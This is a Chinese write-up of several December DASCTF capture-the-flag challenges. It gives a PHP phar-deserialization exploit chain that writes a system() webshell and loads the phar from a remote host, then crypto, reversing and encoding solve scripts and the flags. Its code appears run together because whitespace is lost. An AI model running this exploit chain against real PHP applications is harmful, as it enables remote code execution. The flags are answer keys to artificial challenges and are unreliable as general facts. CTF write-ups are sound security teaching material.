12月DASCTF比赛部分题目wp

?var[template][tp1]=php://filter/read=convert.base64-encode/resource=template.php&tp=tp1

<?phpclass Template{public $content;public $pattern;public $suffix;public function __construct($content){$this->content = $content;$this->pattern = "/{{([a-z]+)}}/";$this->suffix = ".html";}public function __destruct() {$this->render();}public function render() {while (True) {if(preg_match($this->pattern, $this->content, $matches)!==1)break;global ${$matches[1]};if(isset(${$matches[1]})) {$this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content);}else{break;}}if(strlen($this->suffix)>5) {echo "error suffix";die();}$filename = 'ar/wwwml/uploads/' . md5($_SERVER['REMOTE_ADDR']) . "/" .md5($this->content) . $this->suffix;file_put_contents($filename, $this->content);echo "Your html file is in " . $filename;}}?>

POC<?phpclass Template{ public $content; public $pattern; public $suffix;public function construct($content){$this->content = "<?php system('ls /');?>";$this->pattern = "/{{([a-z]+)}}/";$this->suffix = ".php";}public function destruct() {$this->render();}}@unlink("2.phar");$phar = new Phar("2.phar");$phar->startBuffering();$phar->setStub("<?php HALT_COMPILER(); ?>");$o = new Template();$phar->setMetadata($o);$phar->addFromString("text.txt", "test");$phar->stopBuffering();?>

?var[template][tp1]=http://xxx.xxx.xxx.xxx/2.phar&tp=tp1

?var[template][tp1]=phar://uploads/c7b1804959796809f38be8963e32ee54/69fd4882c2f7ebe0a340dad54b62aeba.html&tp=tp1

PS C:UsersAdministrator> php -r "var_dump(md5('NianQingRenBuJiangWuDe'));"Command line code:1:string(32) "c57988283c92f759585a0c1aebfdd743"

左正蹬 -> . 右鞭腿 -> ! 左刺拳 -> ?

DASCTF{f79f28f30232e26a2f51b6b75355afa9}

import libnumfrom binascii import unhexlifyfrom Crypto.Cipher import AESfrom Crypto.Util.number import long_to_bytesn1 =0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47n2 =0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32dc1 =0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffec2 =0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3p = libnum.gcd(n1, n2)q1 = n1 // pq2 = n2 // pe = 65537d1 = libnum.invmod(e, (p-1)*(q1-1))d2 = libnum.invmod(e, (p-1)*(q2-1))m1 = pow(c1, d1, n1)m2 = pow(c2, d2, n2)ct =b"f8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8"ct = unhexlify(ct)key = long_to_bytes(m1)iv = long_to_bytes(m2)aes = AES.new(key, AES.MODE_CBC, iv)print(aes.decrypt(ct))

DASCTF{e4f6c51dc2fe722173e41b47533879bc}

#include<stdio.h>#include<string.h>int main(void){char Array1[] = { 0x7E, 0x7E, 0xF4, 0xA0, 0x26, 0x25, 0x06, 0x73, 0x78,0x6E, 0x77, 0x7A };char Array2[] = { 0x28 , 0x38 , 0x80 , 0xE1, 0x44 , 0x49 , 0x63 };char flag[] = "";int i = 0;for (i = 0; i < 7; i++){printf("%c", Array1[i] ^ Array2[i]);}return 0;}

VFtAble

s = "abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ"#s = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/"def My_base64_encode(inputs):# 将字符串转化为2进制bin_str = []for i in inputs:x = str(bin(ord(i))).replace('0b', '')bin_str.append('{:0>8}'.format(x))#print(bin_str)# 输出的字符串outputs = ""# 不够三倍数，需补齐的次数nums = 0while bin_str:#每次取三个字符的二进制temp_list = bin_str[:3]if(len(temp_list) != 3):nums = 3 - len(temp_list)while len(temp_list) < 3:temp_list += ['0' * 8]temp_str = "".join(temp_list)#print(temp_str)# 将三个8字节的二进制转换为4个十进制temp_str_list = []for i in range(0,4):temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))#print(temp_str_list)if nums:temp_str_list = temp_str_list[0:4 - nums]for i in temp_str_list:outputs += s[i]bin_str = bin_str[3:]outputs += nums * '='print("Encrypted String:n%s "%outputs)def My_base64_decode(inputs):# 将字符串转化为2进制bin_str = []for i in inputs:if i != '=':x = str(bin(s.index(i))).replace('0b', '')bin_str.append('{:0>6}'.format(x))#print(bin_str)# 输出的字符串outputs = ""nums = inputs.count('=')while bin_str:temp_list = bin_str[:4]temp_str = "".join(temp_list)#print(temp_str)# 补足8位字节if(len(temp_str) % 8 != 0):temp_str = temp_str[0:-1 * nums * 2]# 将四个6字节的二进制转换为三个字符for i in range(0,int(len(temp_str) / 8)):outputs += chr(int(temp_str[i*8:(i+1)*8],2))bin_str = bin_str[4:]print("Decrypted String:n%s "%outputs)print()print(" *************************************")print(" * (1)encode (2)decode *")print(" *************************************")print()num = input("Please select the operation you want to perform:n")if(num == "1"):input_str = input("Please enter a string that needs to be encrypted: n")My_base64_encode(input_str)else:input_str = input("Please enter a string that needs to be decrypted: n")My_base64_decode(input_str)

sxnwzxjT

VaGrERfgvatFlag：VFtAble-IsVery-InTeREsting

flag:43bdacb2110079ce1f2c2d93f618463a